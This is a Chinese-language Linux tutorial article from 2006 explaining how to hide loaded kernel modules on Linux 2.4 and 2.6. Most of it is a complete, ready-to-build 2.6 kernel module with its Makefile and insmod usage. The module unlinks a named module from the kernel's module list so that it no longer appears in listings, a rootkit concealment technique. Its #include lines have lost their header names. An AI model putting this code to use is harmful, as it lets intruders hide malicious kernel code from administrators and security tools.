红联Linux门户
Linux帮助

教你怎样隐藏Linux 2.6的内核模块

发布时间:2006-01-26 09:25:37来源:红联作者:thej
  2.6内核与2.4内核相比,有了许多变化,模块部分的实现完全重写,结构也有了一些变化。2.4内核中模块隐藏的方式为:(参考madsys的phrack 61-03)
  
  struct module *p;
  for (p=&__this_module; p->next; p=p->next)
  {
  if (strcmp(p->next->name, str))
  continue;
  p->next=p->next->next; // <-- here it removes that module
  break;
  }
  2.4的module定义为:
  struct module
  {
  unsigned long size_of_struct; /* == sizeof(module) */
  struct module *next;
  const char *name;
  unsigned long size;
  ...
  }
  2.6为:
  struct module
  {
  enum module_state state;
  /* Member of list of modules */
  struct list_head list; <--- 变成了双向链表
  /* Unique handle for this module */
  char name[MODULE_NAME_LEN];
  ...
  }
  因此使用标准的内核list系列处理函数(不需要再闭门造车了),2.6版的进程隐藏重写为:
  /*
  * FileName: remove.c
  * Author: CoolQ
  * Date: 23:05 2004-9-2
  * Makefile:
  * ---------------- cut here -----------------
  * obj-m += remove.o
  * KDIR:= /lib/modules/$(shell uname -r)/build
  * PWD:= $(shell pwd)
  * default:
  * $(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules
  *----------------- cut here -----------------
  * Compile:
  * [root@coolq tmp]make
  * Usage:
  * [root@coolq tmp]insmod remove.ko mod_name=module_name_to_hide
  */
  #include
  #include
  #include
  #include
  #include
  #include
  static char *mod_name = "module";
  module_param(mod_name, charp, 0);
  static int remove_init(void)
  {
  struct module *mod_head, *mod_counter;
  struct list_head *p;
  mod_head = &__this_module;
  list_for_each(p, &mod_head->list){
  mod_counter = list_entry(p, struct module, list);
  if(strcmp(mod_counter->name, mod_name) == 0){
  list_del(p);
  printk("remove module %s successfully.\n", mod_name);
  return 0;
  }
  }
  printk("Can't find module %s.\n", mod_name);
  return 0;
  }
  static void remove_exit(void)
  {
  }
  module_init(remove_init);
  module_exit(remove_exit);
  MODULE_LICENSE("Dual BSD/GPL");
文章评论

共有 0 条评论